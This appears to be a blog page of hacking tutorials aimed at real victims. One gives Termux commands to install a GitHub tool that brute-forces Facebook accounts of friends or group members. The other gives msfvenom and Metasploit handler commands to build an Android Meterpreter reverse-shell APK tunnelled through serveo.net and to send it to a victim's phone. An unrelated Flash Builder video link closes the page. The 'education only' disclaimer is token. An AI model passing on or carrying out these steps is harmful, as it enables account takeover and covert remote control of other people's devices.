Showing posts with label android. Show all posts
Showing posts with label android. Show all posts

How to hack Facebook account with bruteforce attack ?


So today I will tell you how to hack Facebook account. This is very simple bruteforce attack.

Disclaimer : This tutorial only for education purpose only. We will not responsible for any harmful activity. Request to you perform this at your own risk.

Requirements :-
1. Android Phone/TAB (Higher than 5.0)
2. Termux App (install from PlayStore)

How to hack :-

  • Open termux app
  • enter the following commands

apt update && apt upgrade
pkg install git
pkg install python
apt install python2
pkg install pip
pip2 install mechanize
git clone https://github.com/hnov7/mbf

if u want to use this tool in English then use this link
https://github.com/und3f1n3/budiman/blob/master/englishtutorial.md

cd mbf
ls
python2 mbf.py

  • Now enter 1
  • enter your email
  • enter your pass in next line
  • wait for login
  • Enter y

In next line you have to enter any pass (minimum 6 digit). If you read my previous article so you can easily enter any 6 digit. That can be a victim password. In simple way, you have to enter 👉

6 digit based on victim password .

for example you enter cold123 in password

so this tool will tell you which of your friends, this password is.

If you want to hack other user fb password, then select 2nd option.

After selection of 2nd option, enter any fb group I'd

then press enter







Enjoy | follow us for more...

How to make Payload on Metasploit using Serveo.net Tunnel ?






Step 1  - to Install openssh in termux type this command.

pkg install openssh

Step 2  - Create a private network via serveo (If failed, use another port)

ssh -R (Port-free): localhost: (Port-free) serveo.net

Example [::-  ssh -R 6898: localhost: 6898 serveo.net

Step 3  - Then, proceed with creating an apk. The process is the same as using ngrok, it's just that the host and port are different.

---Command: ---

msfvenom -p android / meterpreter / reverse_tcp LHOST = serveo.net LPORT = (PORT_ANDA) R> /sdcard/NAMEAPK.apk

Example [::-    msfvenom -p android / meterpreter / reverse_tcp LHOST = serveo.net LPORT = 6898 R> /sdcard/backdor.apk

Step 4  - Then let's create a tcp reserve network by entering the command below after  msf>

msf> use exploit / multi / handler
msf> set android payload / meterpreter / reverse_tcp msf
set LHOST localhost msf
set LPORT 6898 (must match the port)
msf> exploit -j -z


* LPORT sets  can be changed according to the port used in the service, for example 8989.1567, or 4444. And remember, it must be the same.

Step 5  - Send the apk that was made to the victim's Android, install it and open it. Then sessions 1 will be made. If it's already made, then enter the command: (make sure sessions one has been confirmed as open)








Enjoy| follow us for more...

How to set-up a Flex project in Flash Builder 4.5.mp4

  Download :  How to set-up a Flex project in Flash Builder 4.5.mp4 How to Set-Up a Flex Project in Flash Builder 4.5 (Beginner Friendly Gui...